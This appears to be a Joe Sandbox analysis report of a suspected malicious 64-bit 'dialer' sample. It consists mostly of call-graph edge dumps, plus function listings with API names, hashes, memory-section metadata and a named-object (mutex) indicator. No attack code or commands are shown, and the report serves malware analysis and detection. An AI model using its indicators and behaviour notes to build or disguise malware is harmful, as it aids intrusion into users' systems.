2234->2237 2238 14000519e wcslen 2234->2238 2240 140004e05 wcscpy wcscat wcslen 2234->2240 2584 1400014d6 2234->2584 2657 140001521 2234->2657 2755 140001431 2234->2755 2235->2150 2236->2234 2237->2234 2239 1400015a8 2 API calls 2238->2239 2239->2234 2686 140001422 2240->2686 2243 140001394 2 API calls 2242->2243 2244 14000154e 2243->2244 2245 140001394 2 API calls 2244->2245 2246 14000155d 2245->2246 2247 140001394 2 API calls 2246->2247 2248 14000156c 2247->2248 2249 140001394 2 API calls 2248->2249 2250 14000157b 2249->2250 2251 140001394 2 API calls 2250->2251 2252 14000158a 2251->2252 2253 140001394 2 API calls 2252->2253 2254 140001599 2253->2254 2255 140001394 2 API calls 2254->2255 2256 1400015a8 2255->2256 2257 140001394 2 API calls 2256->2257 2258 1400015b7 2257->2258 2259 140001394 2 API calls 2258->2259 2260 1400015c6 2259->2260 2261 140001394 2 API calls 2260->2261 2262 1400015d5 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015e4 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015f3 2265->2266 2266->2173 2267 140001503 2266->2267 2268 140001394 2 API calls 2267->2268 2269 14000150d 2268->2269 2270 140001394 2 API calls 2269->2270 2271 140001512 2270->2271 2272 140001394 2 API calls 2271->2272 2273 140001521 2272->2273 2274 140001394 2 API calls 2273->2274 2275 140001530 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000153f 2276->2277 2278 140001394 2 API calls 2277->2278 2279 14000154e 2278->2279 2280 140001394 2 API calls 2279->2280 2281 14000155d 2280->2281 2282 140001394 2 API calls 2281->2282 2283 14000156c 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000157b 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000158a 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001599 2288->2289 2290 140001394 2 API calls 2289->2290 2291 1400015a8 2290->2291 2292 140001394 2 API calls 2291->2292 2293 1400015b7 2292->2293 2294 140001394 2 API calls 2293->2294 2295 1400015c6 2294->2295 2296 140001394 2 API calls 2295->2296 2297 1400015d5 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015e4 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015f3 2300->2301 2301->2179 2302 14000156c 2301->2302 2303 140001394 2 API calls 2302->2303 2304 14000157b 2303->2304 2305 140001394 2 API calls 2304->2305 2306 14000158a 2305->2306 2307 140001394 2 API calls 2306->2307 2308 140001599 2307->2308 2309 140001394 2 API calls 2308->2309 2310 1400015a8 2309->2310 2311 140001394 2 API calls 2310->2311 2312 1400015b7 2311->2312 2313 140001394 2 API calls 2312->2313 2314 1400015c6 2313->2314 2315 140001394 2 API calls 2314->2315 2316 1400015d5 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015e4 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015f3 2319->2320 2320->2179 2321 14000145e 2320->2321 2322 140001394 2 API calls 2321->2322 2323 14000146d 2322->2323 2324 140001394 2 API calls 2323->2324 2325 14000147c 2324->2325 2326 140001394 2 API calls 2325->2326 2327 14000148b 2326->2327 2328 140001394 2 API calls 2327->2328 2329 14000149a 2328->2329 2330 140001394 2 API calls 2329->2330 2331 1400014a9 2330->2331 2332 140001394 2 API calls 2331->2332 2333 1400014b8 2332->2333 2334 140001394 2 API calls 2333->2334 2335 1400014c7 2334->2335 2336 140001394 2 API calls 2335->2336 2337 1400014d6 2336->2337 2338 1400014e5 2337->2338 2339 140001394 2 API calls 2337->2339 2340 140001394 2 API calls 2338->2340 2339->2338 2341 1400014ef 2340->2341 2342 1400014f4 2341->2342 2343 140001394 2 API calls 2341->2343 2344 140001394 2 API calls 2342->2344 2343->2342 2345 1400014fe 2344->2345 2346 140001503 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 14000150d 2348->2349 2350 140001394 2 API calls 2349->2350 2351 140001512 2350->2351 2352 140001394 2 API calls 2351->2352 2353 140001521 2352->2353 2354 140001394 2 API calls 2353->2354 2355 140001530 2354->2355 2356 140001394 2 API calls 2355->2356 2357 14000153f 2356->2357 2358 140001394 2 API calls 2357->2358 2359 14000154e 2358->2359 2360 140001394 2 API calls 2359->2360 2361 14000155d 2360->2361 2362 140001394 2 API calls 2361->2362 2363 14000156c 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000157b 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000158a 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001599 2368->2369 2370 140001394 2 API calls 2369->2370 2371 1400015a8 2370->2371 2372 140001394 2 API calls 2371->2372 2373 1400015b7 2372->2373 2374 140001394 2 API calls 2373->2374 2375 1400015c6 2374->2375 2376 140001394 2 API calls 2375->2376 2377 1400015d5 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015e4 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015f3 2380->2381 2381->2179 2383 140001394 2 API calls 2382->2383 2384 14000147c 2383->2384 2385 140001394 2 API calls 2384->2385 2386 14000148b 2385->2386 2387 140001394 2 API calls 2386->2387 2388 14000149a 2387->2388 2389 140001394 2 API calls 2388->2389 2390 1400014a9 2389->2390 2391 140001394 2 API calls 2390->2391 2392 1400014b8 2391->2392 2393 140001394 2 API calls 2392->2393 2394 1400014c7 2393->2394 2395 140001394 2 API calls 2394->2395 2396 1400014d6 2395->2396 2397 1400014e5 2396->2397 2398 140001394 2 API calls 2396->2398 2399 140001394 2 API calls 2397->2399 2398->2397 2400 1400014ef 2399->2400 2401 1400014f4 2400->2401 2402 140001394 2 API calls 2400->2402 2403 140001394 2 API calls 2401->2403 2402->2401 2404 1400014fe 2403->2404 2405 140001503 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 14000150d 2407->2408 2409 140001394 2 API calls 2408->2409 2410 140001512 2409->2410 2411 140001394 2 API calls 2410->2411 2412 140001521 2411->2412 2413 140001394 2 API calls 2412->2413 2414 140001530 2413->2414 2415 140001394 2 API calls 2414->2415 2416 14000153f 2415->2416 2417 140001394 2 API calls 2416->2417 2418 14000154e 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000155d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000156c 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000157b 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000158a 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001599 2427->2428 2429 140001394 2 API calls 2428->2429 2430 1400015a8 2429->2430 2431 140001394 2 API calls 2430->2431 2432 1400015b7 2431->2432 2433 140001394 2 API calls 2432->2433 2434 1400015c6 2433->2434 2435 140001394 2 API calls 2434->2435 2436 1400015d5 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015e4 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015f3 2439->2440 2440->2214 2441 140001530 2440->2441 2442 140001394 2 API calls 2441->2442 2443 14000153f 2442->2443 2444 140001394 2 API calls 2443->2444 2445 14000154e 2444->2445 2446 140001394 2 API calls 2445->2446 2447 14000155d 2446->2447 2448 140001394 2 API calls 2447->2448 2449 14000156c 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000157b 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000158a 2452->2453 2454 140001394 2 API calls 2453->2454 2455 140001599 2454->2455 2456 140001394 2 API calls 2455->2456 2457 1400015a8 2456->2457 2458 140001394 2 API calls 2457->2458 2459 1400015b7 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015c6 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015d5 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015e4 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015f3 2466->2467 2467->2205 2467->2206 2469 140001394 2 API calls 2468->2469 2470 1400014b8 2469->2470 2471 140001394 2 API calls 2470->2471 2472 1400014c7 2471->2472 2473 140001394 2 API calls 2472->2473 2474 1400014d6 2473->2474 2475 1400014e5 2474->2475 2476 140001394 2 API calls 2474->2476 2477 140001394 2 API calls 2475->2477 2476->2475 2478 1400014ef 2477->2478 2479 1400014f4 2478->2479 2480 140001394 2 API calls 2478->2480 2481 140001394 2 API calls 2479->2481 2480->2479 2482 1400014fe 2481->2482 2483 140001503 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 14000150d 2485->2486 2487 140001394 2 API calls 2486->2487 2488 140001512 2487->2488 2489 140001394 2 API calls 2488->2489 2490 140001521 2489->2490 2491 140001394 2 API calls 2490->2491 2492 140001530 2491->2492 2493 140001394 2 API calls 2492->2493 2494 14000153f 2493->2494 2495 140001394 2 API calls 2494->2495 2496 14000154e 2495->2496 2497 140001394 2 API calls 2496->2497 2498 14000155d 2497->2498 2499 140001394 2 API calls 2498->2499 2500 14000156c 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000157b 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000158a 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001599 2505->2506 2507 140001394 2 API calls 2506->2507 2508 1400015a8 2507->2508 2509 140001394 2 API calls 2508->2509 2510 1400015b7 2509->2510 2511 140001394 2 API calls 2510->2511 2512 1400015c6 2511->2512 2513 140001394 2 API calls 2512->2513 2514 1400015d5 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015e4 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015f3 2517->2518 2518->2210 2519 140001440 2518->2519 2520 140001394 2 API calls 2519->2520 2521 14000144f 2520->2521 2522 140001394 2 API calls 2521->2522 2523 14000145e 2522->2523 2524 140001394 2 API calls 2523->2524 2525 14000146d 2524->2525 2526 140001394 2 API calls 2525->2526 2527 14000147c 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000148b 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000149a 2530->2531 2532 140001394 2 API calls 2531->2532 2533 1400014a9 2532->2533 2534 140001394 2 API calls 2533->2534 2535 1400014b8 2534->2535 2536 140001394 2 API calls 2535->2536 2537 1400014c7 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400014d6 2538->2539 2540 1400014e5 2539->2540 2541 140001394 2 API calls 2539->2541 2542 140001394 2 API calls 2540->2542 2541->2540 2543 1400014ef 2542->2543 2544 1400014f4 2543->2544 2545 140001394 2 API calls 2543->2545 2546 140001394 2 API calls 2544->2546 2545->2544 2547 1400014fe 2546->2547 2548 140001503 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 14000150d 2550->2551 2552 140001394 2 API calls 2551->2552 2553 140001512 2552->2553 2554 140001394 2 API calls 2553->2554 2555 140001521 2554->2555 2556 140001394 2 API calls 2555->2556 2557 140001530 2556->2557 2558 140001394 2 API calls 2557->2558 2559 14000153f 2558->2559 2560 140001394 2 API calls 2559->2560 2561 14000154e 2560->2561 2562 140001394 2 API calls 2561->2562 2563 14000155d 2562->2563 2564 140001394 2 API calls 2563->2564 2565 14000156c 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000157b 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000158a 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001599 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015a8 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015b7 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400015c6 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400015d5 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015e4 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015f3 2582->2583 2583->2210 2583->2217 2585 1400014e5 2584->2585 2586 140001394 2 API calls 2584->2586 2587 140001394 2 API calls 2585->2587 2586->2585 2588 1400014ef 2587->2588 2589 1400014f4 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014fe 2591->2592 2593 140001503 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 14000150d 2595->2596 2597 140001394 2 API calls 2596->2597 2598 140001512 2597->2598 2599 140001394 2 API calls 2598->2599 2600 140001521 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001530 2601->2602 2603 140001394 2 API calls 2602->2603 2604 14000153f 2603->2604 2605 140001394 2 API calls 2604->2605 2606 14000154e 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000155d 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000156c 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000157b 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000158a 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001599 2615->2616 2617 140001394 2 API calls 2616->2617 2618 1400015a8 2617->2618 2619 140001394 2 API calls 2618->2619 2620 1400015b7 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015c6 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015d5 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015e4 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015f3 2627->2628 2628->2234 2630 140001394 2 API calls 2629->2630 2631 14000158a 2630->2631 2632 140001394 2 API calls 2631->2632 2633 140001599 2632->2633 2634 140001394 2 API calls 2633->2634 2635 1400015a8 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015b7 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015c6 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015d5 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015e4 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015f3 2644->2645 2645->2234 2647 140001394 2 API calls 2646->2647 2648 1400015b7 2647->2648 2649 140001394 2 API calls 2648->2649 2650 1400015c6 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015d5 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015e4 2653->2654 2655 140001394 2 API calls 2654->2655 2656 1400015f3 2655->2656 2656->2234 2658 140001394 2 API calls 2657->2658 2659 140001530 2658->2659 2660 140001394 2 API calls 2659->2660 2661 14000153f 2660->2661 2662 140001394 2 API calls 2661->2662 2663 14000154e 2662->2663 2664 140001394 2 API calls 2663->2664 2665 14000155d 2664->2665 2666 140001394 2 API calls 2665->2666 2667 14000156c 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000157b 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000158a 2670->2671 2672 140001394 2 API calls 2671->2672 2673 140001599 2672->2673 2674 140001394 2 API calls 2673->2674 2675 1400015a8 2674->2675 2676 140001394 2 API calls 2675->2676 2677 1400015b7 2676->2677 2678 140001394 2 API calls 2677->2678 2679 1400015c6 2678->2679 2680 140001394 2 API calls 2679->2680 2681 1400015d5 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015e4 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015f3 2684->2685 2685->2234 2687 140001394 2 API calls 2686->2687 2688 140001431 2687->2688 2689 140001394 2 API calls 2688->2689 2690 140001440 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000144f 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000145e 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000146d 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000147c 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000148b 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000149a 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400014a9 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400014b8 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400014c7 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400014d6 2709->2710 2711 1400014e5 2710->2711 2712 140001394 2 API calls 2710->2712 2713 140001394 2 API calls 2711->2713 2712->2711 2714 1400014ef 2713->2714 2715 1400014f4 2714->2715 2716 140001394 2 API calls 2714->2716 2717 140001394 2 API calls 2715->2717 2716->2715 2718 1400014fe 2717->2718 2719 140001503 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 14000150d 2721->2722 2723 140001394 2 API calls 2722->2723 2724 140001512 2723->2724 2725 140001394 2 API calls 2724->2725 2726 140001521 2725->2726 2727 140001394 2 API calls 2726->2727 2728 140001530 2727->2728 2729 140001394 2 API calls 2728->2729 2730 14000153f 2729->2730 2731 140001394 2 API calls 2730->2731 2732 14000154e 2731->2732 2733 140001394 2 API calls 2732->2733 2734 14000155d 2733->2734 2735 140001394 2 API calls 2734->2735 2736 14000156c 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000157b 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000158a 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001599 2741->2742 2743 140001394 2 API calls 2742->2743 2744 1400015a8 2743->2744 2745 140001394 2 API calls 2744->2745 2746 1400015b7 2745->2746 2747 140001394 2 API calls 2746->2747 2748 1400015c6 2747->2748 2749 140001394 2 API calls 2748->2749 2750 1400015d5 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015e4 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015f3 2753->2754 2754->2234 2756 140001394 2 API calls 2755->2756 2757 140001440 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000144f 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000145e 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000146d 2762->2763 2764 140001394 2 API calls 2763->2764 2765 14000147c 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000148b 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000149a 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400014a9 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400014b8 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400014c7 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400014d6 2776->2777 2778 1400014e5 2777->2778 2779 140001394 2 API calls 2777->2779 2780 140001394 2 API calls 2778->2780 2779->2778 2781 1400014ef 2780->2781 2782 1400014f4 2781->2782 2783 140001394 2 API calls 2781->2783 2784 140001394 2 API calls 2782->2784 2783->2782 2785 1400014fe 2784->2785 2786 140001503 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 14000150d 2788->2789 2790 140001394 2 API calls 2789->2790 2791 140001512 2790->2791 2792 140001394 2 API calls 2791->2792 2793 140001521 2792->2793 2794 140001394 2 API calls 2793->2794 2795 140001530 2794->2795 2796 140001394 2 API calls 2795->2796 2797 14000153f 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000154e 2798->2799 2800 140001394 2 API calls 2799->2800 2801 14000155d 2800->2801 2802 140001394 2 API calls 2801->2802 2803 14000156c 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000157b 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000158a 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001599 2808->2809 2810 140001394 2 API calls 2809->2810 2811 1400015a8 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015b7 2812->2813 2814 140001394 2 API calls 2813->2814 2815 1400015c6 2814->2815 2816 140001394 2 API calls 2815->2816 2817 1400015d5 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015e4 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015f3 2820->2821 2821->2234

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_0000000140001AE4 30 Function_0000000140001D40 0->30 73 Function_0000000140001BA0 0->73 1 Function_00000001400014E5 68 Function_0000000140001394 1->68 2 Function_00000001400010F0 3 Function_00000001400030F1 4 Function_00000001400058F1 5 Function_00000001400014F4 5->68 6 Function_0000000140002500 7 Function_0000000140001800 62 Function_0000000140002290 7->62 8 Function_0000000140001000 9 Function_0000000140001E00 8->9 37 Function_0000000140001750 8->37 79 Function_0000000140001FB0 8->79 86 Function_0000000140001FC0 8->86 10 Function_0000000140002F00 51 Function_0000000140001370 10->51 11 Function_0000000140005801 12 Function_0000000140005A01 13 Function_0000000140001503 13->68 14 Function_0000000140001404 14->68 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140003110 18 Function_0000000140001512 18->68 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140001521 21->68 22 Function_0000000140005821 23 Function_0000000140001422 23->68 24 Function_0000000140001530 24->68 25 Function_0000000140003130 26 Function_0000000140001431 26->68 27 Function_0000000140005931 28 Function_000000014000153F 28->68 29 Function_0000000140001440 29->68 30->62 31 Function_0000000140001140 45 Function_0000000140001160 31->45 32 Function_0000000140005841 33 Function_0000000140001F47 52 Function_0000000140001870 33->52 34 Function_0000000140002050 35 Function_0000000140005D50 60 Function_0000000140005A90 35->60 36 Function_0000000140003150 36->10 36->13 36->21 36->23 36->24 36->26 36->28 36->29 42 Function_000000014000145E 36->42 44 Function_0000000140002660 36->44 48 Function_000000014000156C 36->48 49 Function_000000014000146D 36->49 36->51 58 Function_000000014000157B 36->58 36->60 76 Function_00000001400015A8 36->76 77 Function_00000001400014A9 36->77 85 Function_00000001400016C0 36->85 97 Function_00000001400014D6 36->97 98 Function_00000001400026E0 36->98 38 Function_0000000140001650 39 Function_0000000140005751 40 Function_0000000140003051 41 Function_000000014000155D 41->68 42->68 43 Function_0000000140002460 45->36 45->45 45->52 59 Function_0000000140001880 45->59 61 Function_0000000140001F90 45->61 45->85 46 Function_0000000140001760 99 Function_00000001400020E0 46->99 47 Function_0000000140001E65 47->52 48->68 49->68 50 Function_000000014000216F 53 Function_0000000140001A70 53->30 53->73 54 Function_0000000140003070 55 Function_0000000140005A70 56 Function_0000000140005771 57 Function_0000000140005871 58->68 59->19 59->30 59->44 59->73 63 Function_0000000140002590 64 Function_0000000140003090 65 Function_0000000140002691 66 Function_0000000140005791 67 Function_0000000140005891 68->35 72 Function_0000000140005AA0 68->72 69 Function_0000000140002194 69->52 70 Function_000000014000219E 71 Function_0000000140001FA0 72->60 73->30 78 Function_00000001400023B0 73->78 92 Function_00000001400024D0 73->92 74 Function_00000001400058A0 75 Function_00000001400059A1 76->68 77->68 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400057B1 84 Function_0000000140001AB3 84->30 84->73 87 Function_00000001400058C1 88 Function_00000001400059C1 89 Function_0000000140001AC3 89->30 89->73 90 Function_00000001400014C7 90->68 91 Function_00000001400026D0 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->30 96->73 97->68 98->1 98->5 98->13 98->18 98->41 98->42 98->44 98->51 98->60 98->77 98->90 100 Function_00000001400017E0 100->99 101 Function_00000001400022E0

                                                                                Executed Functions

                                                                                Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryValueKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                                • Instruction ID: db77473c3d931d0fcdff88eb00413d93014a399b348e2779a93e53daa222875a
                                                                                • Opcode Fuzzy Hash: 6751f840f2f5aebd6751d524e6efc601c9bb43c772484294e188eecfbad3158e
                                                                                • Instruction Fuzzy Hash: 0BF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                                                Non-executed Functions

                                                                                Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a90 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$\BaseNamedObjects\krwgvaizwkrekxljjkewdlmp$`
                                                                                • API String ID: 597572034-4019176162
                                                                                • Opcode ID: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                                • Instruction ID: 6d2fbcda24ca89716a86bde41687ff7fffd3aad73cb8576b26b5126aeab97ea9
                                                                                • Opcode Fuzzy Hash: c600c716e08e094fafbff1190e846a4c8af8233fcc056b851a4b5868120616ec
                                                                                • Instruction Fuzzy Hash: 5F1248B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700
                                                                                Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                                • Instruction ID: f5b649809ecdb1e3254532f3c56674770b0d491324e0a3fa73df4e492b336c57
                                                                                • Opcode Fuzzy Hash: f4770097703a93e6ebc2b28b43cd9dde9cff56eadf7c464ec9f392a7b96236ef
                                                                                • Instruction Fuzzy Hash: DA5122B1A11A4085FB16EF27F9947EA27A5AB8D7D0F808121FB4D873B6DE38C4958300
                                                                                Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
